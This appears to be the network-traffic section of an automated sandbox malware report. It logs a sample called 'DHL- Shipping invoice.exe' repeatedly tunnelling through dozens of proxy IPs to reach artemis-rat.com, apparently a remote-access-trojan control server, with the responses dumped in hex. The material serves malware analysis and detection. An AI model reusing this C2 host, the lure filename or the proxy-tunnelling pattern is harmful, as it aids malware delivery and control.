                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            628192.168.2.451362162.240.75.37806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.367362022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.452945948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453960896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.547014952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.186650991 CET536INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:15 GMT
                            Server: Apache
                            Accept-Ranges: bytes
                            Cache-Control: no-cache, no-store, must-revalidate
                            Pragma: no-cache
                            Expires: 0
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="wi
                            Mar 12, 2024 08:37:18.186671019 CET536INData Raw: 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e
                            Data Ascii: dth=device-width, initial-scale=1.0"> <title>500 Internal Server Error</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571
                            Mar 12, 2024 08:37:18.186683893 CET536INData Raw: 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73
                            Data Ascii: margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size:
                            Mar 12, 2024 08:37:18.186744928 CET536INData Raw: 2d 69 6e 66 6f 20 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20
                            Data Ascii: -info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; min-height: 193px; } .contact-info { margin-bottom: 20px; font-size: 16px;
                            Mar 12, 2024 08:37:18.186758041 CET536INData Raw: 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 75 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f
                            Data Ascii: font-size: 16px; } ul { display: inline-block; list-style: none outside none; margin: 0; padding: 0; } ul li { float: left; text
                            Mar 12, 2024 08:37:18.186780930 CET536INData Raw: 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a
                            Data Ascii: dth: 100%; } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                            Mar 12, 2024 08:37:18.186795950 CET536INData Raw: 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20
                            Data Ascii: background-image: none; } .additional-info-items { padding: 20px; } .container { width: 90%; } .additional-info-items ul li {
                            Mar 12, 2024 08:37:18.186847925 CET536INData Raw: 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20
                            Data Ascii: ze: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left;
                            Mar 12, 2024 08:37:18.186861038 CET536INData Raw: 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 50 41
                            Data Ascii: background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPAAAADqCAMAAACrxjhdAAAAt1BMVEUAAAAAAAD/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
                            Mar 12, 2024 08:37:18.186901093 CET536INData Raw: 4d 39 4d 76 7a 36 6f 47 45 79 58 46 6f 4b 48 66 6d 68 65 6f 65 77 78 39 63 59 65 68 56 75 50 48 4d 54 34 6a 70 68 79 42 74 4e 48 78 48 51 6d 44 47 67 42 76 5a 6a 58 42 75 57 4e 32 67 6f 67 62 50 79 36 52 74 63 4f 65 6a 4e 50 78 46 6b 62 2b 43 45
                            Data Ascii: M9Mvz6oGEyXFoKHfmheoewx9cYehVuPHMT4jphyBtNHxHQmDGgBvZjXBuWN2gogbPy6RtcOejNPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzM
                            Mar 12, 2024 08:37:18.360466957 CET536INData Raw: 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67 43 31 4e 62 59 31 56 53 6b 64 65 42 34 76 58 4d 48 30 4b 53 51 56 49 76 51 66 45 52 63 69 4d 70 63 61 46 74 57 34 48 38 69 49 30 67 42 32 4d 7a 66 45 63 56 33
                            Data Ascii: 6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCA


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            629192.168.2.45193039.108.229.1480026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.367629051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.138461113 CET65INHTTP/1.1 200 Connection established
                            Proxy-Agent: gost/2.11.5


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            630192.168.2.45124391.134.140.160164876484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.372164965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            631192.168.2.451169103.233.2.9048936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.379653931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            632192.168.2.452011174.77.111.19641456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.384339094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            633192.168.2.451979103.146.137.7310816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.389667034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            634192.168.2.452091162.159.242.7806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.398106098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.485567093 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            635192.168.2.451245189.240.60.16390906484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.398185015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.834053993 CET72INHTTP/1.1 200 Connection established
                            Proxy-Agent: Fortinet-Proxy/1.0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            636192.168.2.4519765.10.249.15910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.398726940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            637192.168.2.452085104.16.108.149806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.399188042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.487889051 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            638192.168.2.452100104.19.79.238806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.399794102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.487901926 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            639192.168.2.45135691.134.140.160489626484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.403341055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.562372923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.562972069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            640192.168.2.45202272.195.34.60273916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.413661003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            641192.168.2.451446218.91.158.23073026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.425225973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            642192.168.2.449781162.241.45.22330826484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.439059973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.453214884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            643192.168.2.45196769.61.200.104361816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.440865993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            644192.168.2.45206972.210.221.19741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.443578959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            645192.168.2.45198814.103.24.2080006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.443861961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            646192.168.2.451983103.166.39.936296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.444760084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            647192.168.2.45219549.51.98.584436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.446335077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            648192.168.2.45220449.51.98.584436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.447613955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            649192.168.2.45221049.51.98.584436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.449170113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            650192.168.2.45221189.165.40.84436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.449736118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            651192.168.2.45221249.51.98.584436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.449857950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            652192.168.2.451583117.160.250.163826484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.449894905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.268928051 CET221INHTTP/1.1 403 Access Denied
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Connection: close
                            Cache-Control: no-store
                            Content-Type: text/html
                            Content-Language: en
                            Content-Length: 43
                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                            Data Ascii: You are not allowed to access the document.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            653192.168.2.451984106.14.255.124806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.450723886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.775192022 CET309INHTTP/1.1 400 Bad Request
                            Server: nginx/1.20.1
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
